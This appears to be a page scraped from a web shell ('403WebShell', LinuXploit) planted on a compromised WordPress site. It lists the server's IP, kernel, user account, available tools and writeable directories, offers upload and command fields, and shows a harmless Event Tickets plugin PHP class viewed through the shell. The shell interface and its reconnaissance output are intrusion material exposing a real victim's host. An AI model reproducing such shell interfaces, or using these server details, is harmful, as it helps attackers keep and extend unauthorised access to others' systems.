Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.18.73
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/Tribe/Status/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/plugins/event-tickets/src/Tribe/Status/Abstract.php
<?php


/**
 * Class Tribe__Tickets__Status__Abstract
 *
 * @since 4.10
 *
 */
abstract class Tribe__Tickets__Status__Abstract {

	public $name                = '';
	public $provider_name       = '';
	public $additional_names    = [];
	public $post_type           = '';
	public $incomplete          = false;
	public $warning             = false;
	public $trigger_option      = false;
	public $attendee_generation = false;
	public $attendee_dispatch   = false;
	public $stock_reduced       = false;
	public $count_attendee      = false;
	public $count_sales         = false;
	public $count_completed     = false;
	public $count_canceled      = false;
	public $count_incomplete    = false;
	public $count_refunded      = false;
	public $count_not_going     = false;

	/**
	 * Status  Quantity
	 *
	 * @var int
	 */
	protected $qty        = 0;

	/**
	 * Status Line Total
	 *
	 * @var int
	 */
	protected $line_total = 0;

	/**
	 * Get this Status' Quantity of Tickets by Post Type
	 *
	 * @return int
	 */
	public function get_qty() {
		return $this->qty;
	}

	/**
	 * Add to the  Status' Order Quantity
	 *
	 * @param int $value
	 */
	public function add_qty( $value ) {
		$this->qty += $value;
	}

	/**
	 * Remove from the  Status' Order Quantity
	 *
	 * @param int $value
	 */
	public function remove_qty( $value ) {
		$this->qty -= $value;
	}

	/**
	 * Get  Status' Order Amount of all Orders for a Post Type
	 *
	 * @return int
	 */
	public function get_line_total() {
		return $this->line_total;
	}

	/**
	 * Add to the  Status' Line Total
	 *
	 * @param int $value
	 */
	public function add_line_total( $value ) {
		$this->line_total += $value;
	}

	/**
	 * Remove from the  Status' Line Total
	 *
	 * @param int $value
	 */
	public function remove_line_total( $value ) {
		$this->line_total -= $value;
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit